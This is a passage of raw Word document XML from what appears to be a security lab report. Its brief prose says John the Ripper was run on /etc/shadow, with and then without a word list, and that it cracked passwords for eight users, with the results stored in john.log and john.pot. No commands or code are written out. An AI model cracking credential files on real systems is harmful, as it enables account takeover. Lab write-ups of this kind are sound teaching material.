        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="24892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ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ran John the ripper cracker using a word list first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1917700"/>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1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then,ran john the ripper cracker WITHOUT the word list on /etc/shadow </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color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It creates two files under the hidden john directory under root.The files are john.log and john.pot.  john.log gives the list of all the 8 users whose passwords are cracked and john.pot gives us the corresponding passwords of the users.We can see that in the below screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3605213"/>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color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following grep command in the screenshot below shows all the user accounts on the target machine with a password hash. Based on the screen shot above, ‘john the ripper’ cracked all these passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7110471" cy="2814562"/>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7110471" cy="281456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